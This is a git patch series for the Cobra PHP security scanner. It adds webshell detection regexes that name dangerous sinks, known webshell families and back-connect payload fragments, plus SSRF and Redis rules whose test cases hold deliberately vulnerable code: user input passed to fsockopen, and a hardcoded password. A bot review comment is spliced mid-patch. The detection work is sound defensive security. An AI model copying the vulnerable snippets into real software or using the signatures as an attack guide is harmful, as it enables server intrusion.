(sqlite_create_function\s*\\([\\s\\S]{0,200}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\\s\\S]{0,200}sqlite_create_function\s*\\()| - (\b(filter_var|filter_var_array)\b\s*\\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)))| - 
(\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\\()[\\s\\S]{0,200}\b(filter_var|filter_var_array)\b\s*\\(.*FILTER_CALLBACK[^;]*\\$\\1)| - (\b(mb_ereg_replace|mb_eregi_replace)\b\s*\\((.*,){3}\s*(['\"][^,\"'\\)]*e[^,\"'\\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\\(\s*101|chr\s*\\(\s*0x65|chr\s*\\(\s*0145)\s*\\))| - (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\\s\\(]*(101|0x65|0145))[\\s\\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\b\s*\\((.*,){3}\s*\\$\\1)| - (array_walk(_recursive)?\s*\\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})))| - (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace))[\\s\\S]{0,200}array_walk(_recursive)?\s*\\([^;,]*,\s*(\\$\s*\\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1)))| - (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)\b\s*\\(\s*(file_get_contents\s*\\(\s*)?['\"]php://input)| - (^(\\xff\\xd8|\\x89\\x50|GIF89a|GIF87a|BM|\\x00\\x00\\x01\\x00\\x01)[\\s\\S]*<\\?\s*php)| - (\\$(\\w)=\$[a-zA-Z]\\('',\$\\w\\);\$\\1\\(\\);)| - (\$(\w+)\s*=\s*str_replace\s*\\([\\s\\S]*\$(\w+)\s*=\s*\$(\w+)(([\\s\\S]{0,255})|(\s*\\(\\'\\',\s*(\$(\w+)\s*\\(\s*)+))\$\\1\s*\\([\\s\\S]{0,100};?\s*\$\\2\\(?\s*\\))| + (\s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*)| + 
((?<!->)\bassert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})))| + (\$\s*(\w+)\s*=[\s\(\]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\s\S]{0,200}(?<!\>)\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\s]*\(+[\s\"/*]*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(\"]*\$\s*\1)))| + ((preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\7['\"]*|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))))| + (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\s\(]*(101|0x65|0145|\d+)|['\"](/[^/]*/|\\|[^\\|]*\\||\\'[^']*')\w{0,5}e\w{0,5}['\"])[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\([/*\s]*\$\s*\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))| + (\$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\s\S]{0,1000}(preg_replace|preg_filter)[/*\s]*\(+[/*\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\s\(](101|0x65|0145|\d+)[^,]{0,25}\s*|['\"]\s*(([^\s])[^,]{0,20}\10|[\(\}\[].{0,20}[\(\}\]])\w*e\w*['\"])\s*,([^\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*\$\1))| + ((array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\s]*->u[ak]sort)\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\)]{0,250},[^;\),]{0,50}\$[^;\),]{0,50}\))))| + 
(\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\s\S]{0,200}(?<!\\>)\b(array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\s\S]*->u[ak]sort)\b\s*\(+\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1))[^,;]*,[^;\)]{0,50}\$[^;\)]{0,50}\))| + (((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\))| + (\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\\x|[^,;]*?['\"]\s*\.\s*['\"]))[\s\S]{0,1000}(?<!\\>)((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\s\S]*->\s*createFunction)\s*\(+[^,]*\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\$\s*\1\s*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)))| + (\$(\w*)\s*=\s*\bcreate_function\b\s*\(+\s*[^;\n\r\)]{1,100},\s*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^,\n\r\)]{0,100}file_get_contents.{1,})\s*\)[\s\S]+\$\1\s*\([^\)]*\))| + (\$(\w*)\s*=\s*\bcreate_function\b\s*\([^;]*;[\s\S]*\$\1\s*\([^\)]*(['\"]\s*[^;\n\r\)]{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\)]{0,100}file_get_contents.{1,}))| + 
(\$\s*(\w+)\s*=[\s\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*.{0,100}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\s\S]{0,200}create_function\s*\(+[^,]{1,100},['\"\s]*(\$\s*\1['\"\s]*\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)))| + (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}(?<![:>\s])\s*\$\1\s*\(+[^\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}))| + (sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\()| + (\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)))| + (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*\$\1) + (\b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*(['\"][^,\"'\)]*e[^,\"'\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\(\s*101|chr\s*\(\s*0x65|chr\s*\(\s*0145)\s*\))| + (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\s\(]*(101|0x65|0145))[\s\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*\$\1)| + 
(array_walk(_recursive)?\s*\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})))| + (\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace))[\s\S]{0,200}array_walk(_recursive)?\s*\([^;,]*,\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)))| + (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)\b\s*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input)| + (^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php)| + (\$(\w)=\$[a-zA-Z]\('',\$\w\);\$\1\(\);)| + (\$(\w+)\s*=\s*str_replace\s*\([\s\S]*\$(\w+)\s*=\s*\$(\w+)(([\s\S]{0,255})|(\s*\(\'\',\s*(\$(\w+)\s*\(\s*)+))\$\1\s*\([\s\S]{0,100};?\s*\$\2\(?\s*\))| (ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\)))| - (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\())| - (eval\(\"\\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass)| - (\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se)| - (preg_replace\s*\\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\\\\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c)| - 
(ini_get\s*\(\s*\"disable_functions\"\s*\\)|\\d\s*=>\s*array\s*\\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\\(base64_decode\\(|crypt\\(\$_SERVER\['HTTP_H0ST'\\],\\d+\\)==|if\\(file_exists\\(\$settings\['STOPFILE'\\]\\)\\))| - (\$nofuncs='no\s*exec\s*functions|udf\\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\\.PHP\s*|c999shexit\\(\\)|\$c99sh_|c99_sess_put\\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\\(|coded\s*by\s*tjomi4|john\\.barker446@gmail\\.com|eval\\(\"\\\\\$x=gzin\"|eval\\(\"\\?>\"\\.gzinflate\\(base64_decode\\(|eval\\(gzinflate\\(base64_decode\\(|eval\\(gzuncompress\\(base64_decode\\(|eval\\(gzinflate\\(str_rot13\\(base64_decode\\(|function_exists\\(\"zigetwar_buff_prepare\"\\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\\(\"IIS://localhost/w3svc\"\\)|n57http-based\[\s*-\\]terminal|Dosya\s*Olu|errorlog\\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\\(\"system\"==\$seletefunc\\)\\?system\\(\$shellcmd\\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\\.'code'|phpsocks5_encrypt\\(|define\\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\\(\$__C_C)| - (PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\\(\"N3tsh_surl\"\\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\\]|function_exists\\(\"k1r4_sess_put\"\\)|http://www.7jyewu.cn/|scookie\\('phpspypass|PHVayv.php\\?duzkaydet=|phpRemoteView|define\\('envlpass',|KingDefacer_getupdate\\(|relative2absolute\\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\\]\[\$treeroot\\]|strtolower\\(\$cmd\\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\\+yNjW62S|\$_uU\\(83\\)\\.\$_uU\\(84\\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\\\x50\\\\x4b\\\\x03\\\\x04\\\\x0a\\\\x00\\\\x00\\\\x00\\\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD)| - (\$(\w+)[\\s]*\\=[\\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\\s\\S]*(?<!\\>)\$(?:\\1\\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\\)|(\w+)\s*\\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\\s\\S]*(?<!\\>)\$(\\1\\(\s*\$\\2|\\2\\(\s*\$\\1)\s*\\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\\(\s*\$\\1\s*\\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\\d+)\\]\\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\\d+)\\]\s*\\)) - - + (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\())| + (eval\(\"\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass)| + (\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se)| + (preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c)| + 
(ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\))| + (\$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C)| + (PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\(\"N3tsh_surl\"\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\]|function_exists\(\"k1r4_sess_put\"\)|http://www.7jyewu.cn/|scookie\('phpspypass|PHVayv.php\\?duzkaydet=|phpRemoteView|define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\\]\[\$treeroot\\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD)| + (\$(\w+)[\s]*\\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*(?<!\>)\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*(?<!\>)\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\\]\s*\)) ]]></match> <level value="7"/> From 476dcddc5d4d558e9b81204c6298cf9adf584d56 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 31 Aug 2017 13:33:39 +0800 Subject: [PATCH 06/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-120004=20fsockopen?= =?UTF-8?q?=E9=80=A0=E6=88=90=E7=9A=84SSRF?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-120003.xml | 2 +- rules/CVI-120004.xml | 35 +++++++++++++++++++++++++++++++++++ 2 files changed, 36 insertions(+), 1 deletion(-) create mode 100644 rules/CVI-120004.xml diff --git a/rules/CVI-120003.xml b/rules/CVI-120003.xml index 9584d2c7..63b17a91 100644 --- a/rules/CVI-120003.xml +++ b/rules/CVI-120003.xml @@ -41,5 +41,5 @@ ``` </solution> <status value="on"/> - <author name="Lightless" email="viarus@qq.com"/> + <author name="Lightless" email="root@lightless.me"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-120004.xml b/rules/CVI-120004.xml new file mode 100644 index 00000000..340b9e8f --- /dev/null +++ b/rules/CVI-120004.xml 
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="fsockopen造成的SSRF"/>
+ <language value="php"/>
+ <match mode="function-param-controllable"><![CDATA[fsockopen]]></match>
+ <level value="7"/>
+ <test>
+ <case assert="true"><![CDATA[
+ $host = $_GET['host'];
+ $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
+ ]]></case>
+ </test>
+ <solution>
+ ## 安全风险
+ SSRF漏洞(Server-Side Request Forgery)
+
+ ### 形成原理
+ SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。
+
+ ### 风险
+ 1、攻击者可以对外网、服务器所在内网、本地进行端口扫描,获取服务的banner信息。
+ 2、攻击运行在内网或本地的应用程序。
+ 3、对内网web应用进行指纹识别。
+ 4、攻击内外网的web应用。
+ 5、利用file协议读取本地文件等。
+
+ ## 修复方案
+ 1. 限制协议为HTTP、HTTPS
+ 2. 限制请求域名白名单
+ 3. 禁止30x跳转
+
+ </solution>
+ <status value="on"/>
+ <author name="JoyChou" email="viarus@qq.com"/>
+</cobra>
\ No newline at end of file
From 019b1eba3049603f25765a34c8561c718945c048 Mon Sep 17 00:00:00 2001
From: braveghz <braveghz@gmail.com>
Date: Thu, 31 Aug 2017 13:34:42 +0800
Subject: [PATCH 07/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-350002=20Redis?= =?UTF-8?q?=E5=8C=BF=E5=90=8D=E8=AE=BF=E9=97=AE?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 rules/CVI-350002.xml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 rules/CVI-350002.xml
diff --git a/rules/CVI-350002.xml b/rules/CVI-350002.xml
new file mode 100644
index 00000000..0b22d73c
--- /dev/null
+++ b/rules/CVI-350002.xml
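Review bot: The 修复方案 list is written for an HTTP client, not for `fsockopen`: a raw socket does not follow 30x redirects and has no HTTP/HTTPS scheme to restrict, so items 1 and 3 give the reader nothing actionable for this sink. What matters for `fsockopen` is that the first argument selects the transport as well as the target (`ssl://`, `tls://`, `udp://`, `unix://` prefixes are accepted), so an attacker-controlled `$host` chooses both. I would replace the three items with `1. 对 $host 做主机名白名单校验,并拒绝 ssl://、tls://、udp://、unix:// 等传输前缀` / `2. 解析主机名后拒绝 127.0.0.0/8、169.254.0.0/16 及 RFC1918 内网地址` / `3. 端口同样需要白名单,仅 intval() 不够`. The author line reuses `viarus@qq.com`, the address the sibling CVI-120003 hunk in this same patch just moved Lightless away from, which looks like a copy-paste slip.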
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="Redis匿名访问"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[\-\>connect\((['\"]\w+\.[\w\.]+?['\"]\s*,)\s*(\d+)[\),]]]></match>
+ <level value="4"/>
+ <test>
+ <case assert="true"><![CDATA[
+ $redis = new Redis();
+ $redis->connect('192.168.1.2', 6379);
+ $redis->auth('passwd123!#');
+ $redis->set('key','SS');
+ ]]></case>
+ </test>
+ <solution>
+ ## 安全风险
+ Redis匿名访问
+
+ ## 修复方案
+ 禁止使用匿名方式访问
+ </solution>
+ <status value="on"/>
+ <author name="H4rdy" email="with.h4rdy@gmail.com"/>
+</cobra>
\ No newline at end of file
From f2f1ed1604ec3003f400e0585134bf1f71eb32e8 Mon Sep 17 00:00:00 2001
From: braveghz <braveghz@gmail.com>
Date: Thu, 31 Aug 2017 17:10:36 +0800
Subject: [PATCH 08/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-360001=20CVI-360002?= =?UTF-8?q?=20CVI-360003=20CVI-360007=20=E5=A2=9E=E5=8A=A0webshell?= =?UTF-8?q?=E8=A7=84=E5=88=99?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 rules/CVI-360001.xml | 46 ++++++------------------------
 rules/CVI-360002.xml | 23 +++++++++++++++
 rules/CVI-360003.xml | 23 +++++++++++++++
 rules/CVI-360007.xml | 21 ++++++++++++++
 tests/vulnerabilities/webshell.php | 18 ++++++++++++
 5 files changed, 93 insertions(+), 38 deletions(-)
 create mode 100644 rules/CVI-360002.xml
 create mode 100644 rules/CVI-360003.xml
 create mode 100644 rules/CVI-360007.xml
 create mode 100644 tests/vulnerabilities/webshell.php
diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml
index 19aa4b10..5ca863e1 100644
--- a/rules/CVI-360001.xml
+++ b/rules/CVI-360001.xml
